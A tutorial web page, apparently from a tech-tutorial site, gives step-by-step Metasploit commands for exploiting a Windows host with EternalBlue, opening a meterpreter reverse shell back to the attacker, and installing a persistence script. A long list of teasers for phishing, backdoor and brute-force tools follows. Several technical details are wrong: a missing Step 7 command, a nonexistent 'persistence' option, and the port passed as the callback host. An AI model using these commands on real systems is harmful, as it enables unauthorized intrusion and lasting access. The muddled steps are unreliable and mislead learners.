Creating a Persistent Reverse Shell with Metasploit in Kali Linux Last Updated : 05 Feb, 2023 Comments Improve Suggest changes Like Article Like Report A reverse shell is a type of network connection in which a command shell is executed on a remote machine, and the input and output of the shell are transmitted over the network back to the local machine. This allows a user on the local machine to execute commands on the remote machine and receive the output of those commands. Reverse shells are often used in penetration testing and cybersecurity incident response situations to remotely access and control a compromised system. They can also be used by malicious actors to gain unauthorized access to systems. What is a persistent reverse shell? A persistent reverse shell is a type of reverse shell that is designed to remain active even after the initial connection is terminated. This allows an attacker to maintain access to a compromised system over an extended period of time. To establish a persistent reverse shell, the attacker typically installs a program on the target system that will establish the reverse shell connection and keep it open even if the initial connection is interrupted. This program may be disguised as a legitimate application or may be installed as a service or daemon that runs in the background. Creating a persistent reverse shell with Metasploit in Kali Linux To create a persistent reverse shell with Metasploit in Kali Linux, you will need to perform the following steps: Step 1: First, make sure that Metasploit is installed on your Kali Linux machine. If it is not, you can install it by running the following command: apt-get update && apt-get install metasploit-framework Step 2: Start the Metasploit console by running the following command: msfconsole Step 3: In the Metasploit console, use the search command to find a suitable exploit. For example, you could use the following command to search for exploits that target Windows systems: search windows Step 4: Once you have found a suitable exploit, use the use command to select it. For example, to select the "windows/smb/ms17_010_eternalblue" exploit: use windows/smb/ms17_010_eternalblue Step 5: Set the target for the exploit by using the set command and feed the IP address of the target (10.10.166.240 used for demonstration purposes): set RHOSTS 10.10.166.240 Step 6: Set the payload for the exploit by using the set command. A payload is a code that will be executed on the target machine once the exploit is successful. (Here, the payload for Windows reverse shell is used) set PAYLOAD windows/meterpreter/reverse_tcp Note: Default Payload is windows/x64/meterpreter/reverse_tcp. Step 7: Set the listening host for the reverse shell. (IP address of the attacking machine) This step is optional as the default LPORT is your device's IP: Step 8: Set the listening port for the reverse shell by using the set command. set LPORT <port> Step 9: To create a persistent reverse shell, you will need to set up a persistence script that will run every time the target machine starts up. To do this, use the set command to set the "persistence" option to "true". For example: set persistence true Step 10: Run the exploit by using the exploit command. This will initiate the connection and attempt to exploit the target machine. If the exploit is successful, you should see a meterpreter session open in the Metasploit console. exploit To make the reverse shell persistent, you will need to run the persistence script by typing the following command in the meterpreter session: run persistence -U -i 5 -p 4444 -r <LPORT> This will set up a persistent reverse shell that will connect back to your Kali Linux machine every 5 seconds. Conclusion: In conclusion, a persistent reverse shell is a type of network connection that allows an attacker to remotely execute commands and maintain access to a compromised system over an extended period of time. To create a persistent reverse shell using Metasploit in Kali Linux, you will need to select an appropriate exploit and payload, set the target and listening host and port, and run the exploit. To make the reverse shell persistent, you will need to run a persistence script. It is important to note that creating persistent reverse shells is generally considered malicious activity and should only be done in a controlled environment. It is also important to ensure that proper safeguards are in place to prevent unauthorized access to systems and to secure systems against exploitation. Comment More infoAdvertise with us Next Article Working with Payload Metasploit in Kali Linux H harshmaster07705 Follow Improve Article Tags : Technical Scripter Linux-Unix Technical Scripter 2022 Kali-Linux Linux-Tools +1 More Similar Reads Penetration Testing ToolsDARKARMY - Penetration Testing ToolsThe Darkarmy provides you with a list of tools used for penetration testing all in one place. It saves time for searching for tools under different circumstances. It makes pen testing more straightforward and more user-friendly. It doesn't have built-in tools, but tools will be installed according t 7 min read Validating a Vulnerability Metasploit in Kali LinuxMetasploit is a popular open-source platform for developing, testing, and executing exploits and payloads. It is widely used by security professionals and researchers to identify and exploit vulnerabilities in systems and networks. Metasploit consists of a large database of exploits and payloads tha 6 min read Creating a Persistent Reverse Shell with Metasploit in Kali LinuxA reverse shell is a type of network connection in which a command shell is executed on a remote machine, and the input and output of the shell are transmitted over the network back to the local machine. This allows a user on the local machine to execute commands on the remote machine and receive th 4 min read Working with Payload Metasploit in Kali LinuxThe Metasploit framework is a penetration testing tool for exploiting and validating vulnerabilities. It includes the fundamental architecture, particular content, and tools required for penetration testing and extensive security evaluation. It is a well-known exploitation framework that is routinel 5 min read Using Metasploit and Nmap to Scan for Vulnerabilities in Kali LinuxThe Metasploit framework is a penetration testing tool for exploiting and validating vulnerabilities. It includes the fundamental architecture, particular content, and tools required for penetration testing and extensive security evaluation. It is a well-known exploitation framework that is routinel 3 min read Evil Twin in Kali LinuxEvil Twin Attack is a Wi-Fi hacking technique that tricks the user into connecting to a spoofed targeted network, making it nearly impossible to determine whether the network is real or fake, resulting in the user entering their password in the fake network hosted by the Hacker. How does Evil Twin A 3 min read How to use a Reverse Shell in Metasploit in Kali LinuxMetasploit is not just a single tool. It is a complete framework. It is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code, it is flexible and extremely robust and has tons of tools to perform various simple and complex tasks. Metasploit Fram 4 min read Linux - Metasploit CommandMetasploit is an open-source penetration testing framework and a suite of security tools used for a myriad of purposes like information gathering, scanning, pen testing, exploiting, encoding, firewall evasion, and even post-exploitation phase. The framework is constituted of different categories and 5 min read What is the Metasploit Framework in Linux?A Metasploit framework is a tool that is used by ethical hackers, security researchers, and pentester to testing of the vulnerability. It helps us to find vulnerabilities in networks, systems, and IoT. It's an open-source tool. It can be customized with the operating system. It's a bunch of exploits 4 min read Footprinting with Nmap in Kali LinuxFootprinting is the technique of gathering information about a targeted network or computer system such as the version of OS the target is using, the kernel version (for Linux-based targets), the version of web hosting software (for server targets), etc. Footprinting could be both active and passive 5 min read How to use Hydra to Brute-Force SSH Connections?Let's explore using Hydra to brute-force SSH. One of the most popular tools in a hacker's toolbox is Hydra. It is a great tool for brute force attacks, and you can use it both as a blue team to audit and test ssh passwords against popular password lists like rockyou.txt and crack station wordlists a 5 min read Autopsy - Cyber Forensic Browser in Kali LinuxThe Autopsy is a cyber forensic tool used for the analysis of Windows and UNIX file systems (NTFS, FAT, FFS, EXT2FS, and EXT3FS). It can also be used to recover deleted files and also show various sectors of uploaded images making it easier to make an in-depth analysis of the image. In this article, 2 min read Xcapy - Tool For XSS Detection Suite for CTFs gamesXcapy is a free and open-source tool available on GitHub that was developed to find cross-site scripting (XSS Vulnerabilities) on web applications and websites. Cross-site scripting is a vulnerability found in the javascript code of web applications and websites. This tool is written in python langu 2 min read BrokenSMTP – Python Script to look common vulnerabilities on SMTP serverSMTP (Simple Mail Transfer Protocol) is a protocol for email clients to move messages between servers, on the way to the end-users. What if the security is been breached in middle? All the messages will be leaked and there will be privacy issues which can lead to financial and personal losses for en 3 min read Tool-X - Hacking Tool Installer in Kali LinuxTool-X is a free and open-source tool written in python that is available on GitHub. Tool-X is used by security researchers and pen-testers in the early stages of reconnaissance and pen-testing. It is an installer framework for Kali Linux that has approximately 300 tools available on its menu. It wi 2 min read Kaboom - Automatic Pentest Bash ScriptKaboom is an automated cyber-security tool developed in the Bash Script which can perform the task of Information Gathering on the target host and also can perform Vulnerability Assessment. Kaboom tool has support to multiple target scanning simultaneously, we can pass the range to target IP address 2 min read Fast Google Dorks Scan - Automatic Dork Hacking ToolFast Google Dorks Scan also known as Google Dorking, is a hacker technique that employs Google Search and other Google tools to identify security flaws in website setup and computer code. The OSINT project's main goal is to gather all possible Google dorks search combinations and identify informatio 2 min read How to Install and Use Radio Tray on Linux?Radio Tray is not the traditional software. This is not software that is generally needed by any developer. It is the software that can only fulfill your musical needs. It is online radio-like software. It can be able to play songs online. But there are many other software presents that perform the 5 min read HackerTarget ToolKit - Tools To Help Organizations With Attack Surface DiscoveryInformation Gathering is an important part of Penetration Testing of web applications or any network application. Collecting more information about the target can help the attacker to easily gain access to the target domain server. HackerTarget is a python-based tool that is fully automated for Info 2 min read Longtongue - Customized Password/Passphrase List Inputting Target InfoUsernames and Password values are the most commonly used techniques for authentication pursuits in almost every web application or any type of application. When the credentials provided in this type match the values stored at the target domain server, only the user is authenticated to the website fe 3 min read NXcrypt - Python Backdoor FrameworkNXcrypt is a polymorphic crypter with Python backdoors. The output is completely unnoticeable. NXcrypt uses a multi-threading mechanism to inject a malicious python file into a regular file. Use the superuser's permissions to run it. The output of NXcrypt is completely untraceable and is python base 2 min read Zydra - Recover Password Protected PDF, ZIP, and RARIf you have lost your password of any zip, pdf, rar file, then here is an interesting tool for recovering passwords of the pdf file, zip, rar files. We use to save our crucial data in PDF, ZIP, RAR files as in encrypted format, but sometimes we forget the password and lost our data. Password encrypt 3 min read System Monitoring and ManagementHow to Find Top Running Processes by Memory and CPU UsageEvery current (running) instance of a program is referred to as a process in Linux. There are running processes on every instance of the Linux operating system. , SSHd, SSH processes, and cron jobs are a few examples. A process is started by any application that has to be used. These processes frequ 6 min read Neofetch In Linux – Snap cool screenshots of your LinuxNeofetch is a fancy, highly customizable, and aesthetic command-line system information screenshot utility tool. Written in the Bash scripting language, it works inside a terminal window, on triggering up the command it by default displays the operating system, software, and hardware of your system 4 min read Networking and SecurityOS Detection in Nmap in Kali LinuxNMAP stands for Network Mapper which is an open-source tool used for network exploration and security auditing, in comparison to this, a tool named Nessus is used by industry professionals. These tools are mainly used by cybersecurity experts and hackers. Its main purpose is: Provide the list of the 3 min read Smap - A Drop-In Replacement For Nmap Powered By Shodan.IoSo we all know about the tool Nmap (Network Mapper) and just like the NMAP tool, Smap is also a network scanner that is used to discover any host and services running on a target system by sending packets and analyzing the responses. Smap is a passive Nmap-like scanner built with shodan.io, it is a 2 min read Subjs - Fetches javascript file from a list of URLS or subdomainsThe web-based application is the collection of various hosted files like CSS, HTML, JS, etc. JS files are the core or essential files which can contain some secrets of the web application. Undocumented endpoints information is also crucial, and it can be available in the form of JS files. Subjs is a 3 min read Pathprober - Probe And Discover HTTP PathnamePathprober is an automated tool developed in the Python language which aims to probe and discover HTTP and HTTPS path names by using the technique of brute-forcing and also filters the specific word or can filter more than 2 words. Brute-forcing website directories or HTTP path-name and authenticati 3 min read Subdomains.Sh - Wrapper Around Tool used to find SubdomainsSubdomains are the part of the main domain that comes before the main domain name and domain extension. The functionality of web applications is been divided into various subdomains. In cyber-security subdomains plays an important role, as the bugs which are not detected in the main domain can be id 2 min read Pymeta - Search The Web For Files On A Domain To Download And Extract MetadataPyMeta tool is an automated cyber-security tool which is developed in the Python language that has the potential to search for queries, identify and get the following file types (pdf, xls, xlsx, csv, doc, docx, ppt, pptx) from a given target domain using Google and Bing scraping engines. PyMeta tool 2 min read Dome – Python Script To Obtain Subdomains And Search For Open PortsDome is an automated cyber-security tool developed in the Python language that is used in the process of subdomain enumerations. This subdomain can be tested for getting the bugs out of it. The Dome tool has an active and passive mode for the enumeration process. Dome tool is available on the GitHub 3 min read GONET-Scanner - Golang Network Scanner With Arp Discovery And Own ParserGONET-Scanner tool is an automated cyber-security tool that is developed in the Golang language and can be used in the process of Network Scanning. GONET-Scanner tool has the potential to find the open ports on the specified IP address range. This tool is available on the GitHub platform for free. I 2 min read nrich - Tool to Quickly Analyze all IPsNrich tool is a terminal-based cyber security tool that has the potential to quickly analyze all IPs in a file or from direct input and see which ones have open ports/ vulnerabilities. This tool is a completely automated tool that is developed in the Shell Script language. This tool is officially av 2 min read CyberScan - Network's Forensics ToolKitCyberScan is an open-source penetration testing tool that can analyze packets, decoding, scanning ports, pinging, and geolocation of an IP including (latitude, longitude, region, country.) CyberScan tool is an automated tool developed in Python. CyberScan tool is fully automated and it is available 3 min read IP Rover - OSINT tool to get information of any IP addressIP Rover is a free and open-source tool available on GitHub. IP Rover is one of the famous tools to find information about an IP address and domain. It is used by security researchers and penetration testers in the early stages of penetration testing and reconnaissance. IP Rover is an (OSINT) which 2 min read Ipsourcebypass - Python Script To Bypass IP Source Restrictions Using HTTP HeadersIpsourcebypass tool is an automated cyber security tool that can be used in the process of bypassing IP source restrictions using HTTP headers. Ipsourcebypass tool is developed in the Python language and it supports Python3. This tool is also available on the GitHub platform for free. Ipsourcebypass 2 min read DircoverRB - Passive subdomains and web directories recon using BingGoogle search engine preferably dislikes the scrapers which are used for the information collection or for crawling. So to get the information Bing search engine is been used. DircoverRB is an automated cyber security tool developed in the Ruby language which finds the passive subdomains and also di 2 min read CloudBuster – A Cloudflare ResolverSecuring Web applications from DOS, DDOS, XSS, SQL Injection attack is very much essential in this digital era. Many web applications use a wall in front of their server to save the server from these types of attacks, and this wall is known as Cloudflare. To detect whether the target application use 2 min read Astsu - Network Scanner ToolAstsu is a free and open-source tool available on GitHub. Astsu is written in python language. You must have python language installed in your kali Linux operating system in order to use this tool. Astsu works as a scanner on the network. Astsu is used to scan a network using the IP address. Astsu c 3 min read Crawpy - Yet Another Content Discovery ToolCrawpy is a free and open-source tool available on GitHub. This tool is a free and open-source tool this means you can download and install this tool free of cost. This tool is also called yet another content discovery tool written in python language. Crawpy is developed to work asynchronously this 2 min read Espionage - Network Packet And Traffic InterceptorEspionage is a free and open-source tool available on GitHub. This is a free tool that can be downloaded and installed free of cost. Espionage is a network sniffer. Espionage performs sniffing on data packets of the network. Espionage is used to intercept data packets at the time when data is passed 2 min read UDP-Hunter - Network Assessment ToolUDP-Hunter is a free and open-source tool available on GitHub. UDP-Hunter is written in python language. You must have python language installed in your kali Linux operating system in order to use the tool. UDP-Hunter is used for UDP scanning. UDP-Hunter scans all the UDP services on a network. UDP- 2 min read File and Data ManipulationWoof - Easily Exchange Files Over a Local Network in LinuxIn order to easily share single files between Linux systems in a home network where we don't need to worry too much about security. Woof is an acronym for Web Offer One File. It is used to share files over a local area network. The recipient need not have any special software installed on his system 3 min read Create Custom Wordlists Using Crunch in Kali LinuxIn order to crack a password, we have to try a lot of passwords to get the right one. When an attacker uses thousands or millions of words or character combinations to crack a password, there is no surety that any of those combinations will work. This collection of different combinations of characte 2 min read Web Application Security and ExploitationSQLiv – Massive SQL Injection ScannerSQL Injection is one of the trending and high impactful attacks on the web application. We can perform the scanning process of SQL Injection through automated tools like SQLMap etc. But, there is one of the best tools known as SQLiv tool which is a massive SQL Injection Scanner that can also find th 2 min read XIRA - XSS Vulnerablity ScannerXIRA is a clever XSS detection tool that looks for reflected cross-site scripting (XSS) vulnerabilities using human methodologies. This tool based on python3 is a Python-based automated cyber-security program that can search for queries, and identify XSS vulnerabilities. XIRA Tool, You can use the G 2 min read WhatWaf - Detect And Bypass Web Application Firewalls And Protection SystemsWhatWaf is a cyber-security tool with an automated approach built to detect the firewall and protection details on the target domain server. This tool can help the tester to understand the security system used by the target server and can prepare the attack plan through these details. WhatWaf tool i 2 min read PyPhisher - Simple Python Tool for PhishingPhishing is a social-engineering attack in which the attacker targets the victim's brain for getting critical details like usernames, passwords, etc. In Phishing the clone of the genuine page is been created to bluff the victim and capture the credentials. For example, we can create a phishing page 2 min read Packer-Fuzzer - Fast And Efficient Scanner For Security Detection Of WebsitesPacker-Fuzzer is a scanning tool for fast and efficient security detection of websites constructed by front-end packaging tools such as Webpack. This tool is developed in the Python Language and is available on the GitHub platform for free. It's an open-source tool so you can also contribute to it. 2 min read Second-Order - Subdomain Takeover ScannerThe Second-Order tool is a cyber security-based tool that is used in the scanning of web applications for crawling the application and collecting the sensitive parameterized URLs and other data which match certain patterns and rules. This tool is developed in the Golang language and is available on 2 min read Shellfinder - Simple Tool to Find Shells and Endpoints in WebsitesA shell is a malicious PHP file executed by accessing it via a web browser. It is a PHP script allowing the attacker to control the server - essentially a backdoor program, similar in functionality to a Trojan for personal computers. Shellfinder tool finds the route through which this malicious file 2 min read SpoofThatMail - Check If Domain(s) Can Be Spoofed Based In DMARC RecordsDMARC is a standard email authentication protocol that is designed to assign email domain owners the power to save their respected domains from unauthenticated uses which are also known as spoofing of email. So to check whether the domain is vulnerable to email spoofing we have an automated scanner 2 min read Tplmap - Tool For Automatic Server Side Template Injection ExploitationServer-side template injection is a security flaw in which the hacker injects malicious input into a template to run commands on the server-side. We can use various automated tools to perform this vulnerability exploitation. Tplmap is an automated cyber security tool that can perform checking and ex 2 min read Tulpar - Web Vulnerability Scanner ToolTulpar tool is an automated cyber security tool that is used to gather basic information about the target domain along with this. Tulpar tool is also used in the phase of Vulnerability Scanning. This tool can find security flaws like XSS, SQL Injection, Command Injection, and many more. Tulpar tool 2 min read Altair - Open Source Modular Web Vulnerability ScannerVulnerability Scanning is the methodology to detect the security flaws in the target domain. We can detect these flaws by the manual method in which we can test the HTML elements like buttons, input boxes, and many more. But this approach is a bit lengthy approach, so we can use automated tools. Alt 2 min read Blazy – Open Source Modern Login Brute-forcerBrute-Forcing is the most lengthy password cracking process, but the Blazy tool is not just a brute-force tool, it can also check for CSRF (Cross-Site Request Forgery), Clickjacking, Cloudflare hosts, and even for WAF Vulnerabilities in the target application. Blazy tool is a multi-threading tool an 2 min read SQLbit - Automatize Boolean-Based Blind SQL InjectionsSQL Injection or SQLi is the web application security flaw where the hacker or intruder can mislead with the SQL queries that a web application makes to its storage database. This can lead to viewing data, inserting data, manipulating data without having authorized access. The data which is manipula 3 min read WhatCMS - CMS Detection and Exploit KitWhatcms tool is an automated tool that is capable of detecting the CMS information about the target domain. This tool also gas the exploit kit with multiple sub-tools integrated into it. In the current scenario, the Whatcms tool can detect 33- different CMS applications and services. All the results 2 min read Smuggler - HTTP Request Smuggling / Desync Testing ToolSmuggler is a free and open-source tool available on GitHub. The smuggler tool is used to perform HTTP request smuggling attacks on a domain. HTTP request smuggling is an attack that is performed when a website is processed from the server to the browser. This vulnerability can be used by hackers fo 2 min read NTLMRecon - Tool To Enumerate Information From NTLM Authentication Enabled Web EndpointsNTLMRecon is a free and open-source tool available on GitHub. This tool is used for the NTLM reconnaissance tool without the installation of dependencies. This tool is very useful for security researchers while reconnaissance about NTLM endpoints. The tool needs potential IP addresses and domains. T 2 min read Blackeye Phishing Tool in Kali LinuxBlackeye is a powerful open-source tool Phishing Tool. Blackeye is becoming very popular nowadays that is used to do phishing attacks on Target. Blackeye is an easy Social Engineering Toolkit. Blackeye contains some templates generated by another tool called Blackeye. This tool makes it easy to perf 2 min read X Attacker Tool - Website Vulnerability Scanner and Auto ExploiterXATTACKER tool is an automated approach tool used for scanning and also exploiting the target web applications. XATTACKER tool is developed in the Perl language and it's faster to use. You need to specify the target domain list and the rest of the work is done by the tool. This tool has the capabili 2 min read Information Gathering and OSINTopenSquat - Domain Squatting and Phishing WatchdogopenSquat is an Open-source Intelligence (OSINT) cyber-security tool to specify cybersquatting dangers to specific companies or domains, such as Phishing campaigns, Domain squatting, Typosquatting. This tool supports saving the results in the JSON and CSV file format. openSquat tool is developed in 3 min read Mr.Holmes - Information Gathering OSINT ToolMr.Holmes is a free and open-source tool available on GitHub. Mr.Holmes is used for information gathering. Mr.Holmes is a tool that is used to perform reconnaissance on domains, usernames, and phone numbers. Mr.Holmes works on open-source technology. Mr.Holmes gathers all information that is open so 2 min read Labsecurity - Framework for ethical hacking and computer securityLabsecurity is a free and open-source tool available on GitHub. Labsecurity Is a framework that is used by security researchers and pen-testers in the early stages of reconnaissance. Labsecurity is used for scanning IP and extracting useful information from the website. Labsecurity is a framework th 2 min read Onex - Hacking Tools LibraryOnex is a free and open-source tool available on GitHub. Onex is a complete installer library for Kali Linux which has 370 tools. onex allows installing any of these tools or all the tools simultaneously. These tools are very useful to security researchers and penetration testers. Onex gives the fun 2 min read SourceLeakHacker - Multi Threads Web Application Source Leak ScannerSourceLeakHacker is a multi-thread web directories scanner. This tool is a fully automated cyber security tool that is designed and developed in Python. This tool is freely available on the GitHub platform. You can also contribute to it. This tool can also work with a list of multiple target URLs at 2 min read ShonyDanza - Tool For Researching, Pen Testing, And Defending With The Power Of ShodanShodan is a special search engine that collects data about the device connected to the internet. It is a beneficial tool for Bug Bounty Hunters, Penetration Testers, Hackers, and many security-related actors. We can use the CLI version of Shodan through the means of an automated tool named ShonyDanz 2 min read sigurlfind3r - Passive reconnaissance tool for known URLs discoveryURLs can be beneficial to security researchers for getting a valid bug. URLs carry the information from the client to the server. Various parameters are been used in the URL. These parameters can be used to inject XSS malicious code, Open Redirection check, and many more. So to discover these URLs, 2 min read Snallygaster - Scan For Secret Files On HTTP ServersSome of the files present on the server need to be kept safe from public access, as these can have a bunch of sensitive data like version details, certificates, API keys, and a lot more. So to identify these secret files we have an automated tool names snallygaster. Snallygaster tool is a fully auto 2 min read Webscreenshot - Simple Script To Screenshot A List Of WebsitesPenetrating a large scope domain can be difficult, as this domain can consist of various subdomains. So to visit each subdomain manually is a very much challenging task, as some of the subdomains may be dead subdomains. So what if we can click a screenshot of all subdomains in a single click. Yes, t 2 min read Token-Hunter: Collect OSINT for GitLab groups and membersToken-Hunter is a free and open-source tool available on GitHub. This tool is based upon the technology of OSINT. This tool is a free and open-source tool it means you don't have to give any amount to anyone. Download and install this tool free of cost This tool is used as intended to complement dif 2 min read Maryam v1.4.0 - Open-source Intelligence(OSINT) FrameworkMaryam v1.4.0 is a free and open-source tool available on GitHub. Maryam is based upon Open Source Intelligence (OSINT), the easiest and useful tool for reconnaissance. Maryam interface is very similar to Metasploit 1 and Metasploit 2. Maryam provides a command-line interface that you can run on Kal 2 min read Like